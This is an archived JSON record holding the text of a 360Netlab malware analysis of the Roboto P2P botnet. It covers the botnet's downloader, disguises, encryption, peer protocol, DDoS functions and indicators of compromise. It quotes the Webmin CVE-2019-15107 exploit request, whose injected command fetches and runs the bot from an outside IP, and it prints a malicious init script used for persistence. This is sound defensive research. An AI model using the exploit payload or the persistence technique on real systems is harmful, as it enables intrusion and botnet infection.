{
	"id": "55837751-1acc-4946-8764-163c81f43c07",
	"created_at": "2026-04-06T00:19:54.77689Z",
	"updated_at": "2026-04-10T13:12:58.424256Z",
	"deleted_at": null,
	"sha1_hash": "18c77f7056f1f93147b76f51adf9d6c6a60949e1",
	"title": "The awaiting Roboto Botnet",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2596593,
	"plain_text": "The awaiting Roboto Botnet\r\nBy Alex.Turing\r\nPublished: 2019-11-20 · Archived: 2026-04-05 23:10:44 UTC\r\nBackground introduction\r\nOn August 26, 2019, our 360Netlab Unknown Threat Detection System highlighted a suspicious ELF file\r\n(4cd7bcd0960a69500aa80f32762d72bc) and passed along to our researchers to take a closer look, upon further\r\nanalysis, we determined it is a P2P bot program.\r\nFast forwarded to October 11, 2019, our Anglerfish honeypot captured another suspicious ELF sample\r\n(4b98096736e94693e2dc5a1361e1a720), and it turned out to be the Downloader of the previous suspicious ELF\r\nsample. The Downloader sample downloads the above Bot program from two hard-coded HTTP URLs. One of\r\nthe addresses disguised the Bot sample as a Google font library \"roboto.ttc\", so we named the Botnet Roboto.\r\nWe have been tracking the Roboto Botnet for nearly three months and here are some of its technical features.\r\nRoboto Botnet overview\r\nCurrently, we have captured the Downloader and Bot modules of the Roboto Botnet, and we speculate that it also\r\nhas a vulnerability scanning module and a P2P control module.\r\nRoboto Botnet mainly supports 7 functions: reverse shell, self-uninstall, gather process' network information,\r\ngather Bot information, execute system commands, run encrypted files specified in URLs, DDoS attack, etc.\r\nAt the same time, it also uses Curve25519, Ed25519, TEA, SHA256, HMAC-SHA256 and other algorithms to\r\nensure the integrity and security of its components and P2P network, create the corresponding Linux self-starting\r\nscript based on the target system, and disguise its own files and processes name to gain persistence control.\r\nhttps://blog.netlab.360.com/the-awaiting-roboto-botnet-en\r\nPage 1 of 20\n\nRoboto Botnet has DDoS functionality, but it seems DDoS is not its main goal. We have yet to captured a single\r\nDDoS attack command since it showed up on our radar. We still yet to learn its true purpose.\r\nPropagation\r\nOn October 11th, 2019, the Anglerfish honeypot caught 51.38.200.230 spreading Downloader sample\r\n4b98096736e94693e2dc5a1361e1a720 via the Webmin RCE vulnerability (CVE-2019-15107) . The download\r\nURL is http://190.114.240.194/boot , the following is the exploit Payload.\r\nPOST /password_change.cgi HTTP/1.1\r\nHost: {target}:10000\r\nUser-Agent: Go-http-client/1.1\r\nAccept: */*\r\nReferer: https://{target}:10000/session_login.cgi\r\nCookie: redirect=1; testing=1; sid=x; sessiontest=1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 270\r\nuser=daemon\u0026pam=\u0026new1=x\u0026new2=x\u0026old=x%7Cwget%20190.114.240.194%2Fboot%20-O%20%2Ftmp%2F93b5b5e8%3Bchmod%20777%20%2\r\nWe can see that 51.38.200.230 itself also has the same Webmin service (TCP/10000) open, guess it was also\r\ninfected.\r\nReverse analysis\r\nRoboto Downloadersample analysis\r\nMD5: 4b98096736e94693e2dc5a1361e1a720\r\nELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped\r\nLibrary: musl-libc\r\nThe main function of Roboto Downloader is to download the corresponding encrypted Roboto Bot program from\r\nthe specified URL according to the CPU architecture of the victim machine, and then decrypt and execute it.\r\nCurrently, Roboto Downloader supports both i386 and x86_64 architectures.\r\nhttps://blog.netlab.360.com/the-awaiting-roboto-botnet-en\r\nPage 2 of 20\n\nThe Roboto Downloader sample hard-coded URL stores the encrypted Roboto Bot program. Each group of URLs\r\nhas a corresponding decryption key and SHA256 check value.\r\nTake image2.jpg as an example. Its SHA256 hash value is consistent with the hard-coded SHA256 hash value in\r\nthe Roboto Downloader sample.\r\nhttps://blog.netlab.360.com/the-awaiting-roboto-botnet-en\r\nPage 3 of 20\n\nThe decryption algorithm is as follows, the Key length is 8 bytes, and each round will calculate a new XOR Key.\r\nhttps://blog.netlab.360.com/the-awaiting-roboto-botnet-en\r\nPage 4 of 20\n\nAfter decrypting, we got the Roboto Bot sample.\r\nThe initial XOR Key is not known, but the characteristics of the XOR encryption algorithm can be used to get the\r\nbot file.\r\nAccording to the feature that the value of elf_header[0x8:0xf] is often 0, the Bot file can be decrypted by the\r\nfollowing method.\r\nfstream file(filename, ios::binary | ios::in);\r\nfile.read((char*)fstr.data(), fsize);\r\nfile.close();\r\nstring skey(fstr, 8, 8);\r\nreverse(skey.begin(), skey.end());\r\nuint64_t *sskey = (uint64_t*)\u0026skey[0];\r\ncout \u003c\u003c hex \u003c\u003c \"sskey= \" \u003c\u003c *sskey \u003c\u003c endl;\r\nfstr[0] = '\\x7F';\r\nfstr[1] = 'E';\r\nfstr[2] = 'L';\r\nfstr[3] = 'F';\r\nfstr[6] = '\\x01';\r\nfstr[7] = '\\x00';\r\nfsize -= 8;\r\nuint64_t cnt = fsize / 8;\r\nuint8_t rmd = fsize % 8;\r\nfor (uint64_t i = 0; i \u003c cnt; i++) {\r\nfor (int j = 0; j \u003c 8; j++)\r\n{\r\nfstr[8 + i * 8 + j] ^= *((uint8_t*)sskey + 7 - j);\r\n}\r\nuint64_t rnda = *sskey \u003c\u003c 13 ^ *sskey;\r\nuint64_t rndb = rnda \u003e\u003e 7 ^ rnda;\r\nuint64_t rndc = rndb \u003c\u003c 17 ^ rndb;\r\n*sskey = rndc;\r\nhttps://blog.netlab.360.com/the-awaiting-roboto-botnet-en\r\nPage 5 of 20\n\n}\r\nfor (uint8_t i = 0; i \u003c rmd; i++)\r\n{\r\nfstr[8 * cnt + 8 + i] ^= *((uint8_t*)sskey + rmd - i);\r\n}\r\nif (fstr[42] == '\\x20' \u0026\u0026 fstr[46] == '\\x28')\r\n{\r\nfstr[4] = '\\x01';\r\nfstr[5] = '\\x01';\r\n}\r\nif (fstr[43] == '\\x20' \u0026\u0026 fstr[47] == '\\x28')\r\n{\r\nfstr[4] = '\\x01';\r\nfstr[5] = '\\x02';\r\n}\r\nif (fstr[54] == '\\x38' \u0026\u0026 fstr[58] == '\\x40')\r\n{\r\nfstr[4] = '\\x02';\r\nfstr[5] = '\\x01';\r\n}\r\nif (fstr[55] == '\\x38' \u0026\u0026 fstr[59] == '\\x40')\r\n{\r\nfstr[4] = '\\x02';\r\nfstr[5] = '\\x02';\r\n}\r\nRoboto Bot sample analysis\r\nMD5: d88c737b46f1dcb981b4bb06a3caf4d7\r\nELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped\r\nLibrary: musl-libc\r\nAs aforementioned, Roboto Bot has server build in functions and disguise itself on the victim host.\r\nDisguise\r\nCreate self-starting script based on the release version of the Linux system /etc/init.d/dns-clear or\r\nsystemd-hwdb-upgrade.service\r\n#! /bin/sh\r\n### BEGIN INIT INFO\r\n# Provides: dns-clear\r\n# Required-Start: $local_fs $remote_fs $network\r\n# Required-Stop: $local_fs\r\nhttps://blog.netlab.360.com/the-awaiting-roboto-botnet-en\r\nPage 6 of 20\n\n# Default-Start: 1 2 3 4 5\r\n# Default-Stop:\r\n# Short-Description: Cleans up any mess left by 0dns-up\r\n### END INIT INFO\r\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\r\ncase \"$1\" in\r\n start)\r\n /usr/lib/libXxf86dag.so.1.0.0 \u0026\r\n ;;\r\n *)\r\n ;;\r\nesac\r\nexit 0\r\nFake Process names\r\n(sd-pam)\r\n/sbin/rpcbind\r\n/usr/bin/python\r\nupstart-socket-bridge\r\n/usr/sbin/irqbalance\r\n/lib/systemd/systemd-udevd\r\n/usr/libexec/postfix/master\r\nFile name for masquerading\r\nlibXxf86dag.so\r\n.node_repl_history.gz\r\nHard coded Peer information\r\nhttps://blog.netlab.360.com/the-awaiting-roboto-botnet-en\r\nPage 7 of 20\n\nRoboto Bot hardcoded 4 sets of Peers, the structure is IP: PORT: Curve25519_Pub Key\r\nPeer 1:\r\n213.159.27.5:57491\r\nPubkey:\r\n8E A5 64 E2 A5 F7 73 6D 2E F2 86 D3 7B B7 86 E4\r\n7F 0D A7 A0 77 B1 AD 24 49 5B DE D6 DB B7 E1 79\r\nPeer 2:\r\n186.46.45.252:52085\r\nPubkey:\r\n93 DA 64 B3 1F 49 1B A4 B5 2D 28 92 49 52 7C 3D\r\n41 D2 4F B2 8B FF 2C ED A2 E7 90 18 4F 9E C0 7B\r\nPeer 3:\r\n95.216.17.209:57935\r\nPubkey:\r\nE8 78 31 C6 55 9A 13 FC AB DB 75 9B A5 B1 D6 05\r\nF2 3A 72 FF 04 B5 9F 7F 5A 8B 12 56 F2 CA 01 5E\r\nPeer 4:\r\n120.150.43.45:49252\r\nPubkey:\r\nE7 30 7D 3C BC 93 4A EC ED D8 FD 9F B9 FE 93 B7\r\nF3 53 B3 11 5D F7 C8 CA 0C F8 77 D1 34 CA 37 20\r\n　\r\nhttps://blog.netlab.360.com/the-awaiting-roboto-botnet-en\r\nPage 8 of 20\n\nThe third peer has the following modification in the sample 4cd7bcd0960a69500aa80f32762d72bc\r\nPeer 3:\r\n66.113.179.13:33543\r\nPubkey:\r\nB3 E5 B3 D6 E6 DE 7C 7D 79 40 A5 4F D9 B0 AC 7B\r\n2D C6 CE 69 EF F3 C4 58 F2 98 A8 92 DF 92 9E 0E\r\nEncryption verfication\r\nRoboto Bot uses algorithms such as Curve25519, TEA, and HMAC-SHA256 to implement data encryption and\r\nvalidity verification. This method is widely been used in the generation of cfg files and data packets.\r\nhttps://blog.netlab.360.com/the-awaiting-roboto-botnet-en\r\nPage 9 of 20\n\nThe general process is as shown\r\nhttps://blog.netlab.360.com/the-awaiting-roboto-botnet-en\r\nPage 10 of 20\n\nCurve25519_PrivateKey is generated by /dev/urandom.\r\ncfg file\r\nRoboto Bot will store the generated cfg files in different file locations depending on the privilege it runs.\r\n$home/.config/trolltech.conf //run as regular user\r\n/etc/iproute2/rt_ksfield //run as root\r\nThe cfg file contains the private key, the encrypted data, and the HMAC-SHA256 value of the encrypted data,\r\nwhich are updated every hour. The encrypted data is composed of Peer and Port information, and its structure is\r\npeer:length:data,pcfg:length:data.\r\nhttps://blog.netlab.360.com/the-awaiting-roboto-botnet-en\r\nPage 11 of 20\n\nCfg file decryption example\r\nThe first 0x20 byte，Curve25519 private key\r\n 68 F4 83 18 2C F2 80 3D D1 B3 FF 68 FB 35 3D E8\r\n E6 C8 DB 0B 8E FC 73 7C 01 B3 6F 3F 1C 89 38 63\r\nThe last 0x20 byte，hmac-sha256 hash (0x20-0x165)\r\n 1B 64 C4 FD 65 C0 95 9B 6F B1　D7 C1 75 31 DA 5A\r\n 01 EC E1 52 06 25 E9 7D A1 9B　57 E5 CA 67 2B D6\r\n \r\nEncryption verification\r\n1. Generate publicKey:\r\n 52 25 27 87 F2 B2 F7 35 32 1F ED A7 6A 29 03 A8\r\n 3F A4 51 58 EF 53 F5 6F 28 99 01 8E 62 2C 4A 24\r\n2. Using last 16 bytes, DWORD reverse，to be used as encryption key for TEA:\r\n 58 51 A4 3F 6F F5 53 EF 8E 01 99 28 24 4A 2C 62\r\n3. Using the above Key, to get XOR Key:\r\n First round: ED 16 FB 00 46 4F 94 99\r\n4. XOR decryption，repeat step 4 on every 8 byte，to update XOR Key:\r\n Ciphertext: 9D 73 9E 72 76 4E DE 99\r\n Plaintext: peer\\x30\\x01\\x4a\\x00\\x00\r\nhttps://blog.netlab.360.com/the-awaiting-roboto-botnet-en\r\nPage 12 of 20\n\nTherefore, we know that Peer has 0x130 bytes of information, and so on, the plaintext of the ciphertext (8E 3C 1F\r\n93 B1 C9) is (pcfg\\x04\\x00).\r\nP2P control module\r\nRoboto Bot can be controlled by a Unix domain socket. The bound path is /tmp/.cs\r\nThe following code starts the control process\r\nWe did not find the relevant code to set the environment variable \"CS\" in the Roboto Bot sample, so we\r\nspeculated that it is in the Roboto P2P control module. It starts a process, sets the environment to \"CS\", and\r\ncontrols the Roboto Bot module through a Unix domain socket. then the P2P node becomes the control node in the\r\nBotonet P2P network.\r\nWe can get a good idea on the functions of the P2P control module through the Roboto Bot module, these function\r\nnames are very intuitive.\r\nWe tested some of the control commands by hijacking the Roboto Bot program. Here are some test results.\r\ninfo The command will display hard-coded information and public key information, including the v17 , we\r\nsuspect it is a program version number.\r\nhttps://blog.netlab.360.com/the-awaiting-roboto-botnet-en\r\nPage 13 of 20\n\npeers The command displays the P2P node information currently connected by Roboto Bot.\r\nBot function\r\n/proc/%s/exe\r\n/proc/%s/cmdline\r\n/proc/net/tcp\r\n/proc/net/udp\r\ncrontab\r\nhttps://blog.netlab.360.com/the-awaiting-roboto-botnet-en\r\nPage 14 of 20\n\nGet the Bot information and upload it to the specified HTTP interface.\r\nhttps://blog.netlab.360.com/the-awaiting-roboto-botnet-en\r\nPage 15 of 20\n\nRun the encrypted file in the specified URL (similar to the Roboto Downloader function)\r\nThe DDoS attack\r\nDepending on the running privilege it gets, Bot provides four DDoS attack methods: ICMP Flood, HTTP\r\nFlood, TCP Flood, and UDP Flood.\r\nP2P communication protocol\r\nBesides using the P2P communication protocol, Roboto Bot employs algorithms such as Curve25519, TEA, and\r\nHMAC-SHA256 to ensure data integrity and security. The encrypted Key is derived from the\r\nCurve25519_SharedKey generated by the public key in the Bot and C2 information. The format of the packet is\r\nindex(4 bytes):type(1 byte):data:hmac-sha256[0:0xf], so packets larger than 21 bytes contain valid information.\r\nP2P node discovery data verification\r\nThe length of the request packet is a fixed 69 bytes, the data is not encrypted, and the content is the public key of\r\nthe target Peer and the public key of the Bot. After receiving the Bot request packet, Peer establishes a connection\r\nhttps://blog.netlab.360.com/the-awaiting-roboto-botnet-en\r\nPage 16 of 20\n\nwith the Bot if it is consistent with its own public key, and then calculates the SharedKey through the public key.\r\nIn the subsequent communication process, the message with valid information (length greater than 21 words)\r\nSection) will be encrypted.\r\nP2P node discovery data decryption\r\nThe local Petoto Bot sample is communicated with the hard-coded Peer (186.46.45.252), and a new Peer node\r\n87.249.15.18:63104 is taken as an example.\r\nBot request, 69 bytes\r\nindex: 00 00 00 00\r\ntype: 2\r\ndata:\r\n 0-31: C2 Curve25519_PublicKey\r\n93 DA 64 B3 1F 49 1B A4 B5 2D 28 92 49 52 7C 3D\r\n41 D2 4F B2 8B FF 2C ED A2 E7 90 18 4F 9E C0 7B\r\n32-63: Bot Curve25519_PublicKey\r\nhttps://blog.netlab.360.com/the-awaiting-roboto-botnet-en\r\nPage 17 of 20\n\n52 25 27 87 F2 B2 F7 35 32 1F ED A7 6A 29 03 A8\r\n3F A4 51 58 EF 53 F5 6F 28 99 01 8E 62 2C 4A 24\r\nPeer reply, 60 bytes,\r\nindex: 00 00 00 00\r\ntype: 00\r\ndata:\r\ncmdtype:\r\n4f\r\nip:port\r\n44 be 1c 18 da 42\r\nPublibcKey:\r\n7e 42 89 b6 36 5f 73 10 88 ea 60 36 b9 ca 89 25\r\n3e 3e e3 2f 7e b6 d6 08 9e 96 89 25 68 a0 9f 7f\r\nHmac-sha256[0:0xf]\r\nb5 1a d7 0d d4 63 83 0e de 06 34 ad 36 cc 83 4e\r\nAnalog decryption verification process\r\n1. Bot’s private key and Pee’s public key to generate shared key\r\nSharedKey:\r\n 28 EC 2D A8 63 F3 2D 39 8F 1C 03 96 32 AE F2 D8\r\n B8 D1 9E 6C ED BD AC 2C BE D6 CF 60 83 C9 D6 1D\r\n2. Using first 16 byte of HMAC-SHA256 for verification\r\nHMAC-SHA256[0:0XF]=\r\nb5 1a d7 0d d4 63 83 0e de 06 34 ad 36 cc 83 4e\r\n3. Using last 16 bytes of the sharedkey, DWORD reverse，to be used as encryption key for TEA:\r\nA8 2D EC 28 39 2D F3 63 96 03 1C 8F D8 F2 AE 32\r\n4. Using the above Key, to get XOR Key:\r\nFirst round: 4E 13 47 13 0A 2C C2 6A\r\nSecond round: B0 68 BD EB 9B 29 10 23\r\nThird round: AD B4 3D 34 40 C0 3D FC\r\nFourth round: 31 1E 6B F0 EA D5 8E 65\r\nFivth round: D1 1C 42 58 2A 0C 7D A4\r\n5. XOR dencryption，repeat step 4 on every 8 byte，to update XOR Key and get plaintext\r\n cmdtype:\r\n 01\r\n ip:port:\r\n 57 F9 0F 12 :F6 80 (87.249.15.18:63104)\r\n PublicKey:\r\n 14 F2 E1 0B DD C4 5A 00 AB 47 D4 0B 8D 8A 49 18\r\nhttps://blog.netlab.360.com/the-awaiting-roboto-botnet-en\r\nPage 18 of 20\n\nC2 0F FD 44 8E 5C 03 86 FB 47 95 67 30 8A 93 02\r\nFrom the following network packets, we can see 87.249.15.18:63104 is exactly what we calculated.\r\nAttack command verification\r\nIn a P2P network, nodes are untrustworthy, and anyone can forge a P2P node at a very low cost. In order to ensure\r\nthat the Roboto network is completely controllable and not stolen by others, Roboto needs to perform signature\r\nverification for each attack command. Only the attack messages that can be signed and signed can be accepted and\r\nexecuted by the Roboto node.\r\nThe verification method adopted by Roboto is ED25519, which is a public digital signature algorithm. At the same\r\ntime, the check public key is: 60FF4A4203433AA2333A008C1B305CD80846834B9BE4BBA274F873831F04DF1C , the public\r\nkey is integrated into each of the Roboto Bot samples.\r\nSuggestions\r\nWe recommend that Webmin users take a look whether they are infected by checking the process, file name and\r\nUDP network connection as we coverd above.\r\nWe recommend that Roboto Botnet related IP, URL and domain names to be monitored and blocked.\r\nContact us\r\nReaders are always welcomed to reach us on twitter, WeChat 360Netlab or email to netlab at 360 dot cn.\r\nIoC list\r\nSample MD5\r\n4b98096736e94693e2dc5a1361e1a720\r\n4cd7bcd0960a69500aa80f32762d72bc\r\nd88c737b46f1dcb981b4bb06a3caf4d7\r\nEncrypted Roboto Bot MD5\r\nimage.jpg de14c4345354720effd0710c099068e7\r\nimage2.jpg 69e1cccaa072aedc6a9fd9739e2cdf90\r\nhttps://blog.netlab.360.com/the-awaiting-roboto-botnet-en\r\nPage 19 of 20\n\nroboto.ttc f47593cceec08751edbc0e9c56cad6ee\r\nroboto.ttf 3020c2a8351c35530ab698e298a5735c\r\nURL\r\nhttp://190.114.240.194/boot\r\nhttp://citilink.dev6.ru/css/roboto.ttc\r\nhttp://citilink.dev6.ru/css/roboto.ttf\r\nhttp://144.76.139.83:80/community/uploadxx/1461C493-38BF-4E72-B118-BE35839A8914/image.jpg\r\nhttp://144.76.139.83:80/community/uploadxx/1461C493-38BF-4E72-B118-BE35839A8914/image2.jpg\r\nHard-coded Peer IP\r\n95.216.17.209 Finland ASN 24940 Hetzner Online GmbH\r\n213.159.27.5 Italy ASN 201474 Aircom Service srl\r\n186.46.45.252 Ecuador ASN 28006 CORPORACION NACIONAL DE TELECOMU\r\n120.150.43.45 Australia ASN 1221 Telstra Corporation Ltd\r\n66.113.179.13 United States ASN 14280 NetNation Communications Inc\r\nSource: https://blog.netlab.360.com/the-awaiting-roboto-botnet-en\r\nhttps://blog.netlab.360.com/the-awaiting-roboto-botnet-en\r\nPage 20 of 20\n\ndata: 0-31: C2 Curve25519_PublicKey   \n93 DA 64 B3 1F 49 1B A4 B5 2D 28 92 49 52 7C 3D\n41 D2 4F B2 8B FF 2C ED A2 E7 90 18 4F 9E C0 7B\n32-63: Bot Curve25519_PublicKey   \n  Page 17 of 20",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.netlab.360.com/the-awaiting-roboto-botnet-en"
	],
	"report_names": [
		"the-awaiting-roboto-botnet-en"
	],
	"threat_actors": [],
	"ts_created_at": 1775434794,
	"ts_updated_at": 1775826778,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/18c77f7056f1f93147b76f51adf9d6c6a60949e1.pdf",
		"text": "https://archive.orkl.eu/18c77f7056f1f93147b76f51adf9d6c6a60949e1.txt",
		"img": "https://archive.orkl.eu/18c77f7056f1f93147b76f51adf9d6c6a60949e1.jpg"
	}
}